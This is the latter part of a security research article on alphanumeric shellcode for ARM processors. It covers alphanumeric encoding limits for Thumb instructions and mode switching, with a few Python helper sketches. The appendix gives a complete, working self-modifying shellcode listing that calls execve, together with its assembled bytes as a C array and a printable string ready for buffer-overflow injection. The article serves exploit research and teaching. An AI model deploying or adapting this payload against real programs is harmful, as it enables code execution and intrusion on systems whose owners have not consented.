    +--+--+--+--+--+----------+-----+-----+

    The constraints on register use in this case depend on the value of
    the immediate. Bit 7 of the instruction is bit 1 of imm_5, so that
    bit of the immediate must be 0. In no case can Rn and Rd both be R0
    at the same time. If imm_5 is odd (i.e. bit 6 is set), then most
    other register combinations can be used. However, if imm_5 is even
    (i.e. bit 6 is not set), then only R6 and R7 can be used as Rn.

  - LDR (2) does the same as LDR (1) except that the offset to the
    register containing the memory address to read from is stored in a
    register and as a result can be larger than 32.

    Syntax: LDR <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 1| 0| 0| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    Since bit 7 must be 0, Rm is already constrained to registers R0,
    R1, R4 and R5. However, if Rm is R0 or R4, then Rn must be R6 or R7.
    If Rm is R1 or R5 then Rn and Rd cannot both be R0.

  - LDR (3) loads a word into a register based on an 8 bit offset from
    the program counter (PC).

    Syntax: LDR <Rd>, [PC, #<imm_8> * 4]

     15 14 13 12 11 10  8 7             0
    +--+--+--+--+--+-----+---------------+
    | 0| 1| 0| 0| 1| Rd  | imm_8         |
    +--+--+--+--+--+-----+---------------+

    As with ADD (2) and CMP (1), Rd can be any low register but imm_8
    must follow the constraints of being alphanumeric.

  - LDRB (1) is essentially the same as LDR (1) except that it loads a
    byte from memory instead of a word.

    Syntax: LDRB <Rd>, [<Rn>, #<imm_5>]

     15 14 13 12 11 10       6 5   3 2   0
    +--+--+--+--+--+----------+-----+-----+
    | 0| 1| 1| 1| 1| imm_5    | Rn  | Rd  |
    +--+--+--+--+--+----------+-----+-----+

    Similar restrictions apply, with the added restriction however that
    imm_5 must be lower than 12, because otherwise the first byte is
    larger than 'z' (0x7a).
    However, if imm_5 is 11 or 10, then bit 7 of the second byte will be
    set to one, so in reality it must be lower than 10 and not equal to
    7, 6, 3 or 2.

  - LDRB (2) is the same as LDR (2) except that it behaves like
    LDRB (1), i.e. it loads a byte instead of a word.

    Syntax: LDRB <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 1| 1| 0| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    Since the second byte is identical, the same restrictions as for
    LDR (2) apply to it. Note, however, that bits 15 to 9 are 0101110,
    so the first byte is 0x5c or 0x5d ('\' or ']'), which is not
    alphanumeric whichever registers are chosen.

  - LDRH (2) is the same as LDR (2) and LDRB (2), except it loads a
    halfword (16 bits).

    Syntax: LDRH <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 1| 0| 1| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    The same restrictions as for LDR (2) apply to the second byte. In
    addition, Rm must be R0 or R1: with R4 or R5, bit 8 is set and the
    first byte becomes 0x5b ('['), which is not alphanumeric.

  - LDRSB is the same as LDRB (2), except that it interprets the byte
    that it loads as signed.

    Syntax: LDRSB <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 0| 1| 1| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    Again, the same restrictions apply to the second byte as for
    LDR (2). The first byte is 0x56 or 0x57 ('V' or 'W').

  - LDRSH is the halfword equivalent of LDRSB.

    Syntax: LDRSH <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 1| 1| 1| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    The second byte follows the same restrictions as for LDR (2), but as
    with LDRB (2) the first byte (0x5e or 0x5f, '^' or '_') is not
    alphanumeric.

- MOV: There are three versions of this instruction: MOV (1) to MOV (3),
  but only MOV (3) is alphanumeric. MOV (3) moves to, from or between
  high registers.

  Syntax: MOV <Rd>, <Rm>

   15 14 13 12 11 10  9  8   7   6 5   3 2   0
  +--+--+--+--+--+--+--+--+---+---+-----+-----+
  | 0| 1| 0| 0| 0| 1| 1| 0| H1| H2| Rm  | Rd  |
  +--+--+--+--+--+--+--+--+---+---+-----+-----+

  As with other instructions (ADD and CMP) that operate on high
  registers, Rd cannot be R0 if Rm is R8, and using two low registers is
  unpredictable.
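The four Thumb instructions that operate on high registers (ADD (4),
CMP (3), MOV (3) and BX) share one encoding format, so their register
restrictions can be enumerated with a few lines of Python. This is only
a sketch under that assumption: the names OPS, encode_hi_op and
is_alnum16 are ours, and for BX the Rd field stands in for the SBZ bits
and is left at 0.

```python
import string

# The 62 byte values that count as alphanumeric: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode())

# Bits 9-8 select the operation within the hi-register format.
OPS = {"ADD": 0b00, "CMP": 0b01, "MOV": 0b10, "BX": 0b11}

def encode_hi_op(op, rd, rm):
    """Thumb hi-register format: 010001 | op | H1 | H2 | Rm[2:0] | Rd[2:0]."""
    return (0b010001 << 10 | OPS[op] << 8 | (rd >> 3) << 7 |
            (rm >> 3) << 6 | (rm & 7) << 3 | (rd & 7))

def is_alnum16(half):
    """True if both bytes of a 16-bit Thumb instruction are alphanumeric."""
    return all(b in ALNUM for b in half.to_bytes(2, "big"))

# Registers that BX can branch through while staying alphanumeric.
bx_ok = [rm for rm in range(16) if is_alnum16(encode_hi_op("BX", 0, rm))]
print(bx_ok)

# MOV r0, r8 produces an '@' in the second byte, MOV r1, r8 does not.
print(is_alnum16(encode_hi_op("MOV", 0, 8)),
      is_alnum16(encode_hi_op("MOV", 1, 8)))

# BX pc, listed from the high byte down.
print(encode_hi_op("BX", 0, 15).to_bytes(2, "big"))
```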
- MUL:

  Syntax: MUL <Rd>, <Rm>

   15 14 13 12 11 10  9  8  7  6 5   3 2   0
  +--+--+--+--+--+--+--+--+--+--+-----+-----+
  | 0| 1| 0| 0| 0| 0| 1| 1| 0| 1| Rm  | Rd  |
  +--+--+--+--+--+--+--+--+--+--+-----+-----+

  Since the second byte of MUL is identical to the second byte of the
  ADC instruction, it has the same limitations. I.e. we can't use R0 as
  both Rm and Rd, and the second byte must stay out of the ranges
  0x5b-0x60 and 0x7b-0x7f; all other combinations of low registers are
  valid.

- NEG:

  Syntax: NEG <Rd>, <Rm>

   15 14 13 12 11 10  9  8  7  6 5   3 2   0
  +--+--+--+--+--+--+--+--+--+--+-----+-----+
  | 0| 1| 0| 0| 0| 0| 1| 0| 0| 1| Rm  | Rd  |
  +--+--+--+--+--+--+--+--+--+--+-----+-----+

  The second byte of NEG is identical to the second bytes of MUL and
  ADC, so the same limitations apply.

- STR: As with LDR, there are many versions of STR: STR (1) to STR (3),
  STRB (1) and (2), STRH (1) and (2). However, STR (3) and STRH (1) are
  not alphanumeric.

  - STR (1), the complementary instruction to LDR (1), stores a word
    from a register to memory. As with LDR (1), it takes an immediate of
    5 bits that it multiplies by 4 and uses as offset for a base
    register that contains a memory address to write to.

    Syntax: STR <Rd>, [<Rn>, #<imm_5> * 4]

     15 14 13 12 11 10       6 5   3 2   0
    +--+--+--+--+--+----------+-----+-----+
    | 0| 1| 1| 0| 0| imm_5    | Rn  | Rd  |
    +--+--+--+--+--+----------+-----+-----+

    The same limitations as with LDR (1) apply.

  - STR (2) is the complementary instruction to LDR (2).

    Syntax: STR <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 0| 0| 0| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    Again, the same limitations as with LDR (2) apply.

  - STRB (1) is complementary to LDRB (1).

    Syntax: STRB <Rd>, [<Rn>, #<imm_5>]

     15 14 13 12 11 10       6 5   3 2   0
    +--+--+--+--+--+----------+-----+-----+
    | 0| 1| 1| 1| 0| imm_5    | Rn  | Rd  |
    +--+--+--+--+--+----------+-----+-----+

    Since bit 11 is 0, the limitations are less stringent than with
    LDRB (1).
    As such, the limitations of STR (1) apply rather than the ones of
    LDRB (1).

  - STRB (2) is complementary to LDRB (2).

    Syntax: STRB <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 0| 1| 0| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    The same limitations on the second byte as with LDRB (2) apply.

  - STRH (2) is complementary to LDRH (2).

    Syntax: STRH <Rd>, [<Rn>, <Rm>]

     15 14 13 12 11 10  9 8   6 5   3 2   0
    +--+--+--+--+--+--+--+-----+-----+-----+
    | 0| 1| 0| 1| 0| 0| 1| Rm  | Rn  | Rd  |
    +--+--+--+--+--+--+--+-----+-----+-----+

    The same limitations on the second byte apply.

- SUB: There are four versions of SUB, but only SUB (2) is alphanumeric.

  Syntax: SUB <Rd>, #<imm_8>

   15 14 13 12 11 10  8 7             0
  +--+--+--+--+--+-----+---------------+
  | 0| 0| 1| 1| 1| Rd  | imm_8         |
  +--+--+--+--+--+-----+---------------+

  Since the second byte of SUB (2) only contains an immediate, it has
  the same limitations as the second byte of ADD (2), CMP (1) and
  LDR (3). However, unlike in ADD (2), CMP (1) and LDR (3), we can't use
  any register for Rd. Since the first 5 bits of SUB are 00111, the
  first byte covers a range of 0x38 to 0x3f. However, only 0x38 and 0x39
  (the characters '8' and '9') are alphanumeric. This means that we can
  only use registers R0 and R1 as Rd with this SUB instruction.

- TST:

  Syntax: TST <Rn>, <Rm>

   15 14 13 12 11 10  9  8  7  6 5   3 2   0
  +--+--+--+--+--+--+--+--+--+--+-----+-----+
  | 0| 1| 0| 0| 0| 0| 1| 0| 0| 0| Rm  | Rn  |
  +--+--+--+--+--+--+--+--+--+--+-----+-----+

  Since bits 7 and 6 are both set to 0, bits 5 and 4 must be set to 1.
  This yields the following restrictions:
  - Rm must be either R6 or R7.
  - If Rm is R6, then Rn can be any low register.
  - If Rm is R7, then Rn can only be R0 or R1.

An important instruction that is missing from the above list is the SWI
instruction. To be able to get around the fact that SWI is not
alphanumeric in Thumb mode, we overwrite it from ARM mode.
However, unlike the SWI in ARM mode, the argument to SWI will not be
used to determine the system call number that we want to call. Instead,
we must place the system call number into R7. Unlike in ARM mode, where
we must add 0x900000 to the system call number, we can just place the
number in R7 as is.

An example of calling execve in ARM mode:

    SWI 0x90000b

In Thumb mode:

    MOV r7, #0x0b
    SWI 48

----[ 2.9 Going to ARM Mode

For programs that we wish to exploit that are already running in Thumb
mode, we still have a problem: we can't write self-modifying code in
Thumb mode because we can't call SWI to perform a cache flush. However,
since the BX instruction is alphanumeric in Thumb mode, we can use that
instruction to get us into ARM mode, where we can do all the cool stuff
we've discussed above.

Here is an example of a code snippet that gets us into ARM mode:

    BX pc
    ADD r7, #50

We need the ADD instruction as a nop because PC will point to the
current instruction + 4. The BX pc instruction will be represented
alphanumerically as 'G''x'.

--[ 3. Conclusion

This article shows that alphanumeric shellcode is realistic on the ARM
processor, even though it is harder to generate because of the nature of
the ARM processor. Any operation, including non-alphanumeric
instructions, can be executed by writing self-modifying code and
flushing the instruction cache. Consequently, alphanumeric shellcode is
Turing complete.

The Thumb instruction set can be used, if available, to facilitate
writing shellcode. Its denser instruction structure makes it somewhat
easier to generate alphanumeric bytes. However, having access to the
Thumb instruction set is not required.

--[ 4. Acknowledgements

The authors would like to thank Frank Piessens, tetsuki and tohomo for
their contributions to the project which resulted in this article. We
would also like to thank HD Moore for his helpful suggestions when we
were trying to make our shellcode printable.
Shoutouts to the people from nologin/uninformed: arachne, bugcheck,
dragorn, gamma, h1kari, hdm, icer, jhind, johnycsh, mercy, mjm, mu-b,
nemo, ninja405, pandzilla, pusscat, rizzo, rjohnson, sih, skape,
skywing, slow, trew, vf, warlord, wastedimage, west, X, xbud

--[ 5. References

[0] The ARM Architecture Reference Manual
    http://www.arm.com/miscPDFs/14128.pdf

[1] Writing ia32 alphanumeric shellcodes
    http://www.phrack.org/issues.html?issue=57&id=18#article

[2] Into my ARMs: Developing StrongARM/Linux shellcode
    http://www.isec.pl/papers/into_my_arms_dsls.pdf

--[ A. Shellcode Appendix

----[ A.0 Writable Memory

For debugging purposes, it is convenient to execute the shellcode as a
normal application, instead of injecting it into a buffer. However, if
it's compiled as a normal application, the code will be loaded in
non-writable code memory. Since our shellcode is self-modifying, the
application will first have to set the memory to writable before
executing the code. This can be done with the following code fragment:

    .ARM
    # set the text section writable
    MOV r0, #32768
    MOV r1, #4096
    MOV r2, #7
    BL mprotect

Of course, this is not necessary when the shellcode is injected through
a buffer overflow. The memory that contains the buffer will always be
writable.

----[ A.1 Example Shellcode

In this example, the shellcode starts up, switches to Thumb mode and
executes the application "/execme". Some of the techniques presented
here are: getting a known value into a register, modifying our own
shellcode, flushing the instruction cache, and switching from ARM to
Thumb.
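The self-modifying steps in this example all start from a register whose
low byte is known (0xFF when the register holds -1, or 56) and reach the
byte they need with EOR immediates that are themselves alphanumeric. As
a rough illustration of that arithmetic only, and not part of the
original shellcode, the Python sketch below replays the immediates used
in the listing of this example. The names `is_alnum`, `patch_byte` and
`PATCHES` are made up for this sketch.

```python
import string

# Byte values of the ASCII letters and digits.
ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))


def is_alnum(value):
    """Return True if the byte value is an ASCII letter or digit."""
    return value in ALNUM


def patch_byte(start, immediates):
    """XOR the low byte of `start` with each immediate in turn.

    Each immediate becomes a byte of the instruction encoding, so it is
    required to be alphanumeric; the resulting byte need not be.
    """
    value = start & 0xFF
    for imm in immediates:
        if not is_alnum(imm):
            raise ValueError("immediate %#x is not alphanumeric" % imm)
        value ^= imm
    return value


# (known register value, EOR immediates), copied from the listing.
# The labels are informal descriptions chosen for this sketch.
PATCHES = {
    "cache flush SWI, byte 0x9F": (-1, (80, 48)),
    "BXPL r6, byte 0x16": (56, (66, 108)),
    "BXPL r6, byte 0x2F": (56, (86, 65)),
    "Thumb SWI, byte 0xDF": (-1, (97, 65)),
}

for name, (start, imms) in PATCHES.items():
    print("%-28s -> 0x%02X" % (name, patch_byte(start, imms)))
```

None of the four resulting bytes is alphanumeric, which is why they have
to be written into the code at run time instead of appearing in it
directly.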
    # our shellcode starts here
    # nops
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    # do not change these instructions
    # we will use them to load a value
    # into our register
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    # continue nops
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56
    SUBPL r3, r1, #56

    # we can't load directly from
    # PC so we must get PC into r3
    # we do this by subtracting 48
    # from PC
    SUBMI r3, pc, #48
    SUBPL r3, pc, #48

    # load 56 into r3
    LDRPLB r3, [r3, #-48]
    LDRMIB r3, [r3, #-48]

    # Set r5 to -1
    # update the flags: result is negative
    # so we know we need MI from now on
    SUBMIS r5, r3, #57
    SUBPLS r5, r3, #57

    # r7 to stackpointer
    SUBMI r7, SP, #48

    # Set r3 to 0
    # set positive flag
    SUBMIS r3, r3, #56

    # set r4 to 0
    SUBPL r4, r3, r3, ROR #2

    # Set r6 to 0
    SUBPL r6, r4, r4, ROR #2

    # store registers to stack
    STMPLFD r7, {r0, r4, r5, r6, r8, lr}^

    # r5 to -121
    SUBPL r5, r4, #121

    # copy PC to r6
    SUBPL r6, PC, r5, ROR #2
    SUBPL r6, r6, r5, ROR #2
    SUBPL r6, r6, r5, ROR #2
    SUBPL r6, r6, r5, ROR #2
    SUBPL r6, r6, r5, ROR #2
    SUBPL r6, r6, r5, ROR #2
    SUBPL r6, r6, r5, ROR #2

    # write 0 to SWI 0x414141
    # becomes: SWI 0x410041
    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    STRPLB r3, [r6, #-100]

    # put 56 back into r3
    # we are positive after this
    EORPLS r3, r3, #56
    SUBPL r7, r3, #57

    # write 9F to SWI 0x410041
    # becomes SWI 0x9F0041
    # we are negative after this
    EORPLS r5, r7, #80
    # negative
    EORMIS r5, r5, #48
    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    STRMIB r5, [r6, #-99]

    # write 2 to SWI 0x9F0041
    # becomes SWI 0x9F0002
    SUBMI r5, r3, #54
    STRMIB r5, [r6, #-101]

    # write 0x16 to 0x51303030
    # becomes 0x51303016
    # positive
    EORMIS r5, r3, #66
    EORPLS r5, r5, #108
    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    STRPLB r5, [r6, #-89]

    # write 2F to 0x51303016
    # becomes 0x512F3016
    EORPLS r5, r3, #86
    EORPLS r5, r5, #65
    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    STRPLB r5, [r6, #-87]

    # write FF to 0x512F3016
    # becomes 0x512FFF16 (BXPL r6)
    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    STRPLB r7, [r6, #-88]

    # r7 = -1
    # set r3 to -121
    SUBPL r3, r7, #120
    #
    SUBPL r6, r6, r3, ROR #2

    # write DF for swi to 0x3030
    # becomes 0xDF30 (SWI 48)
    # becomes negative
    EORPLS r5, r7, #97
    EORMIS r5, r5, #65
    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    STRMIB r5, [r6, #-73]

    # Set positive flag
    EORMIS r7, r4, #56

    # load arguments for SWI
    # r0 = 0, r1 = -1, r2 = 0
    SUBPL r5, SP, #48
    # We use LDMPLFA, because it's one of the few instructions
    # we can use to write to the registers R0 to R2.
    # Other instructions generate non-alphanumeric characters
    LDMPLFA r5!, {r0, r1, r2, r6, r8, lr}

    # Set r7 to -1
    # Negative after this
    SUBPLS r7, r7, #57

    # This will become:
    # SWIMI 0x9f0002
    SWIMI 0x414141

    # Set positive flag again
    EORMIS r5, r4, #56

    # set thumb mode
    SUBPL r6, pc, r7, ROR #2

    # this should be BXPL r6
    # but in hex that's
    # 0x51 0x2f 0xff 0x16, so we
    # overwrite the 0x30 above
    .byte 0x30,0x30,0x30,0x51

    .THUMB
    .ALIGN 2

    # We assume r2 is 0 before
    # entering Thumb mode

    # copy pc to r0
    mov r0, pc

    # OFFSET USED HERE
    # IF CODE CHANGES, CHANGE OFFSET
    # misalign r0 to address of 1execme2 - 47
    # we will write to r0+47 and r0+54
    # (beginning of the string)
    add r0, #100
    sub r0, #105

    # set r1 to 0
    mul r1, r2
    # set r1 to 47
    add r1, #97
    sub r1, #50
    # store r1 ('/') at r0+47
    # string becomes /execme2
    strb r1, [r0, r1]

    # set r1 to 0
    mul r1, r2
    # set r1 to 54
    add r1, #54
    # store 0 at r0+54
    # string becomes /execme\0
    strb r2, [r0, r1]

    # set r1 to 0
    mul r1, r2
    # set r1 to -1
    add r1, #48
    sub r1, #49
    # set r7 to 1
    neg r7, r1

    # set r1 to 0
    mul r1, r2
    # set r1 to 11 (0xb),
    # the exec system call code
    add r1, #65
    sub r1, #54
    # our systemcall code must be in r7
    # r7 = 1, r1 contains the code
    mul r7, r1

    # set r1 to 0 (second parameter of execve)
    mul r1, r2

    # set r0 to beginning of the string
    add r0, #97
    sub r0, #50

    # This will become: swi 48
    .byte 0x30,0x30

    # This is a nop used for
    # alignment
    add r7, #50

    # our command
    .ascii "1execme2"

    # nops used for alignment
    add r7, #50
    add r7, #50

----[ A.2 Resulting Bytes

char shellcode[] =
    "\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
    "\x52\x30\x30\x4f\x42\x30\x30\x4f\x52\x30\x30\x53\x55\x30\x30\x53"
    "\x45\x39\x50\x53\x42\x39\x50\x53\x52\x30\x70\x4d\x42\x38\x30\x53"
    "\x42\x63\x41\x43\x50\x64\x61\x44\x50\x71\x41\x47\x59\x79\x50\x44"
    "\x52\x65\x61\x4f\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46"
    "\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46\x50\x64\x30\x46"
    "\x55\x38\x30\x33\x52\x39\x70\x43\x52\x50\x50\x37\x52\x30\x50\x35"
    "\x42\x63\x50\x46\x45\x36\x50\x43\x42\x65\x50\x46\x45\x42\x50\x33"
    "\x42\x6c\x50\x35\x52\x59\x50\x46\x55\x56\x50\x33\x52\x41\x50\x35"
    "\x52\x57\x50\x46\x55\x58\x70\x46\x55\x78\x30\x47\x52\x63\x61\x46"
    "\x50\x61\x50\x37\x52\x41\x50\x35\x42\x49\x50\x46\x45\x38\x70\x34"
    "\x42\x30\x50\x4d\x52\x47\x41\x35\x58\x39\x70\x57\x52\x41\x41\x41"
    "\x4f\x38\x50\x34\x42\x67\x61\x4f\x50\x30\x30\x30\x51\x78\x46\x64"
    "\x30\x69\x38\x51\x43\x61\x31\x32\x39\x41\x54\x51\x43\x36\x31\x42"
    "\x54\x51\x43\x30\x31\x31\x39\x4f\x42\x51\x43\x41\x31\x36\x39\x4f"
    "\x43\x51\x43\x61\x30\x32\x38\x30\x30\x32\x37\x31\x65\x78\x65\x63"
    "\x6d\x65\x32\x32\x37\x32\x37";

80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR
80AR80AR80AR80AR80AR80AR80AR80AR80AR00OB00OR00SU00SE9PSB9PSR0pMB80SBcACP
daDPqAGYyPDReaOPeaFPeaFPeaFPeaFPeaFPeaFPd0FU803R9pCRPP7R0P5BcPFE6PCBePFE
BP3BlP5RYPFUVP3RAP5RWPFUXpFUx0GRcaFPaP7RAP5BIPFE8p4B0PMRGA5X9pWRAAAO8P4B
gaOP000QxFd0i8QCa129ATQC61BTQC0119OBQCA169OCQCa02800271execme22727

--------[ EOF